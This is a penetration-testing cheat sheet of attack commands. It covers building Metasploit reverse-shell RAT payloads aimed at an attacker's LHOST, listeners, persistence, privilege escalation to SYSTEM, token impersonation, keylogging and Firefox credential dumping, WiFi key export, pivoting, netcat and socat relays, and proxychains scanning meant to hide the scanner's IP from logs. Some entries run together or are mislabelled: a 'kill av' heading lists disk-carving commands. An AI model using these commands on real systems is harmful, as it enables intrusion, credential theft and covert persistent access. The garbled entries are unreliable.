Pentesting Notes

Commands

Start a Shell in Python

python -c 'import pty; pty.spawn("/bin/bash")'
Export WiFi Keys
- Windows: netsh wlan export profile folder=%TEMP%
- Linux: cat /etc/wpa_supplicant.conf
Check for MS08-067

nmap -p 445 --script=smb-check-vulns --script-args=unsafe=1 $@

Create RAT:

msfpayload windows/meterpreter/reverse_{tcp,http,https} LHOST=<ip> LPORT=<port> X > rat.exe
Create VBS RAT:

msfpayload windows/meterpreter/reverse_{tcp,http,https} LHOST=<ip> LPORT=<port> R > rat.raw python shellcode2vbscript.py rat.raw rat.vbs
Encode RAT:

msfencode and msfvenom
Listener:

use exploit/multi/handler set payload windows/meterpreter/reverse_tcp
Listen for multiple connections:

exploit -j / sessions / sessions -i
Hijack another process:

migrate <pid> or run migrate -n <process name>
Install RAT:

run persistence
Elevate to SYSTEM:

getsystem
Metasploit pivoting (This allows you to access the local LAN via the already comprimised host):

run autoroute -s <local network/cidr>
Impersonate users:

incognito, impersonate_token
Metasploit: kill av

$ dd if=<in file> of=<out file>
$ mkdir <mountpoint>
$ mount -o loop -t <type> <image> <mountpoint>
$ foremost -i <image> -t all -v
$ scalpel

Metasploit: run post/* (e.g. run post/windows/capture/keylog_recorder) firefox_creds dumplinks
Metasploit: download command

Listen-Connect: Relay connections on lport to rhost:rport socat tcp-listen:<lport>,reuseaddr tcp-connect:<rhost>:<rport> ncat -l <lport> -c "ncat <rhost> <rport>"
Listen-Listen: Connect to lport1 then lport2 socat tcp-listen:<lport1>,reuseaddr tcp-listen:<lport2> ncat -l <lport 1> -c "ncat -l <lport2>"
Connect-Connect: Listeners must first be set up on rhost:rport socat tcp-connect:<rhost1>:<rport1>,reuseaddr tcp-connect:<rhost2>:<rport2> ncat <rhost1> <rport1> -c "ncat <rhost2> <rport2>"
SSH Tunnels:
- Forward traffic on localhost:lport to rhost:rport: ssh <user>@<host> -L <lport>:<rhost>:<rport>
- Forward traffic traffic on host:port to rhost:rport: ssh <user>@<host> -R <port>:<rhost>:<rport>

SSH into a jumpbox and run tshark

jumpbox$ tshark -i eth0 not port 22 and tcp
See what non-anonymous scan looks like (your public IP will show up in tshark):

localhost$ nmap <jumpbox ip> -p 80
Test anonymous scanning (real IP still shows up in tshark):

localhost$ proxychains nmap <jumpbox ip> -p 80
Run an anonymous connect scan (real IP only shows up initially in tshark):

localhost$ proxychains nmap -sT <jumpbox ip> -p 80
Try again (real IP does not show up in tshark):

localhost$ proxychains nmap -sT -Pn <jumpbox ip> -p 80

Note: scanning a hostname instead of IP will put a DNS request from your real IP in the logs–scan the direct IP instead. (see proxyresolv)

Setup iptables to disallow all traffic to target (forces you to send it over proxychains):

`iptables -A OUTPUT --dest <target ip> -j DROP`

File transfer:

nc -l <port> <ip> < <input file> nc <ip> <port> > <output file>

netstat -pant | grep LISTEN
Flush wireless network connections
http://www.renderlab.net/projects/WPA-tables/
Set SSID to a common name with a long passphrase
HTTP-Everywhere
https://panopticlick.eff.org/index.php?action=log&js=yes
beaverbird.com
digitalocean.com
https://www.digitalocean.com/?refcode=92d344b69f50
http://torrentfreak.com/which-vpn-services-take-your-anonymity-seriously-2014-edition-140315/
grugq.github.io
Nmap can route a scan through a pwned box
Netcat can be used as a simple port scanner–possibly upload to pwned box